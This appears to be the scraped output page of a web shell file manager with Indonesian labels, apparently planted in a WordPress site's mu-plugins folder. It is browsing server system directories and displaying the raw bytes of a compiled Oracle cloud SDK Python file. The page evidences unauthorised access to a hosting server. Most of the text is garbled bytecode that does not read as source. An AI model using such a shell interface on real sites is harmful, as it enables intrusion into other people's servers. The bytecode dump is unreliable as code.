📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
data_safe
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/data_safe/models
💾
Free:
45.7 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: generate_report_details.pyc
a N��f�% � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s e Zd ZdZdZdZdd� Zedd� �Zej dd� �Zed d � �Z e j dd � �Z edd � �Zej dd � �Zedd� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zdd� Zd d!� Zd"d#� Zd$S )%�GenerateReportDetailsz, Details for the report generation. �PDF�XLSc K sd ddddddddd�| _ dddd d ddd d�| _d| _d| _d| _d| _d| _d| _d| _d| _ dS )a� Initializes a new GenerateReportDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param display_name: The value to assign to the display_name property of this GenerateReportDetails. :type display_name: str :param target_ids: The value to assign to the target_ids property of this GenerateReportDetails. :type target_ids: list[str] :param description: The value to assign to the description property of this GenerateReportDetails. :type description: str :param compartment_id: The value to assign to the compartment_id property of this GenerateReportDetails. :type compartment_id: str :param mime_type: The value to assign to the mime_type property of this GenerateReportDetails. Allowed values for this property are: "PDF", "XLS" :type mime_type: str :param time_less_than: The value to assign to the time_less_than property of this GenerateReportDetails. :type time_less_than: datetime :param time_greater_than: The value to assign to the time_greater_than property of this GenerateReportDetails. :type time_greater_than: datetime :param row_limit: The value to assign to the row_limit property of this GenerateReportDetails. :type row_limit: int �strz list[str]�datetime�int)�display_name� target_ids�description�compartment_id� mime_type�time_less_than�time_greater_than� row_limit�displayName� targetIdsr � compartmentId�mimeType�timeLessThan�timeGreaterThan�rowLimitN) � swagger_types� attribute_map� _display_name�_target_ids�_description�_compartment_id� _mime_type�_time_less_than�_time_greater_than� _row_limit)�self�kwargs� r'